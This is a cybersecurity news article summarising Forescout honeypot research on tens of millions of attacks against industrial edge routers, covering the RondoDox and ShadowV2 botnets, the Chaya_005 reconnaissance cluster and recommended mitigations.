Perimeter Under Siege: 60 Million Attacks Target Industrial Edge Routers in 90-Day Surge
Over a three-month observation period, Forescout researchers recorded more than 60 million malicious requests targeting devices positioned at the edge of industrial networks. Analysis of honeypot activity revealed a clear pattern: perimeter devices—industrial routers and firewalls—are attacked far more frequently than systems that happen to be accidentally exposed to the internet. These edge assets alone accounted for nearly two-thirds of all observed malicious activity.
The majority of requests targeted SSH and Telnet services, with automated credential-stuffing and brute-force login attempts posing the primary threat. HTTP and HTTPS traffic, which made up nearly a quarter of the activity, was largely associated with vulnerability exploitation attempts and the delivery of malicious payloads.
Among the most prominent emerging threats were the RondoDox and ShadowV2 botnets. RondoDox, first detected only in May, already leverages more than 50 exploits, some of which lack public identifiers. ShadowV2, which appeared later, is also rapidly gaining momentum. Both rely on the same tactic: executing commands designed to download malicious binaries onto vulnerable devices.
Particular attention was drawn to an activity cluster dubbed Chaya_005. Its behavior is atypical: HTTP requests include malformed exploits, parameters that do not align with the targeted devices, yet collectively demonstrate an intent to elicit a response from potentially vulnerable systems. This does not resemble standard botnet behavior, but may instead reflect a reconnaissance phase—building a target list for subsequent use, whether for malware delivery, cryptomining, or proxy deployment.
Chaya_005 has been active for at least two years. Its early activity focused on exploiting a known vulnerability in Sierra Wireless routers, but over time the group shifted to other devices and address ranges. Notably, some IP addresses reappeared at roughly one-year intervals, and no malicious binaries were ultimately delivered—circumstantial evidence suggesting a preparatory or research-oriented campaign. Furthermore, the IP addresses involved showed no signs of broader compromise or participation in typical malicious activity.
While it cannot be entirely ruled out that Chaya_005 is linked to a research entity rather than a purely malicious actor, such a scenario appears unlikely. According to the report’s authors, the greatest risk stems from attempts to exploit routers that have reached end of support. One such example is the LS300 model, which has not received security updates since 2021, with the phase-out of 3G networks further diminishing its relevance. Nevertheless, devices of this type remain in use across industrial environments.
The authors stress that as IT and OT environments become increasingly intertwined, threats can no longer be neatly categorized as either “informational” or “operational.” A previous incident in Denmark’s energy sector—where companies were forced into isolated operating modes—was triggered by the compromise of edge routers originally deployed for IT purposes. Such cases are not isolated; similar infrastructure weaknesses persist across Europe.
To mitigate these risks, experts recommend identifying all network-connected devices, changing default credentials, disabling unused services, isolating OT assets from the public internet, and deploying monitoring solutions capable of detecting intrusion attempts and anomalous behavior.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
